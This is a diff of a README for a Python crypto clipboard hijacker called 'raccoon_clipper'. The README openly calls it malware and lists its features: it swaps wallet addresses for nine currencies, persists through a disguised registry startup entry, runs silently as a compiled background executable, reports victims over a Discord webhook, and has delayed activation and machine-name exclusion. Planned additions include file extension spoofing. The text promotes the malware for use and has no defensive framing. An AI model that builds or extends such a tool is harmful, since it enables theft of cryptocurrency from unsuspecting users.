3022-2/raccoon_clipper/README.md

 - has documentation built into the GUI under the documentation tab

 malware features
-- supports Bitcoin, Ethereum, Litecoin, Monero, Solana, Dogecoin, Ripple, Tron at the same time
+- supports Bitcoin, bitcoin cash, Ethereum, Litecoin, Monero, Solana, Dogecoin, Ripple, Tron at the same time
-- three different types of the same malware but using different methods. subprocess, ctypes and pyperclip
+- six different types of the same malware but using different methods. subprocess, ctypes and pyperclip
+    - tkinter uses the tkinter libary - fully python standard libary so no pip installs (is fastest + best on old/shit hardware)
     - subprocess uses powershell commands to read and set clipboard - uses python standard libary so no need for the target to install anything
     - ctypes uses ctypes to read clipboard and powerhsell to set clipboard - uses python standard libary so no need for the target to install anything
-    - pyperclip uses the pyperclip module to read and set clipboard - requires the target the run the command pip install pyperclip
+    - pyperclip uses the pyperclip module to read and set clipboard - requires the target the run the command ```pip install pyperclip```
+    - clipboard is literally a reskin of pyperclip - requires the target the run the command ```pip install clipboard```
+    - win32clipboard uses the libary pywin32 - requires the target the run the command ```pip install pywin32```
 - duplicates and adds itself to startup apps (registry) for persistence under a different name
 - has single use method
 - allows discord webhook (whenever a address is detected you get a discord notification which says the computer name and that the address has been changed), doesnt need any installs as uses http.client rather than requests to send POST requests to webhook
 - option to ping @everyone
 - malware saved as .pyw and then compiled to .exe meaning that the malware runs in the background silently
+- has a 3 restard incubate feature
+- has a ignore feature (to not run on computers with a given computer name)

 features i will want to add in the future
-- [ ] more supported crypto currencies
+- [x] more supported crypto currencies
 - [ ] self check to avoid multiple instances
 - [ ] file extention spoofer
 - [ ] file size pumper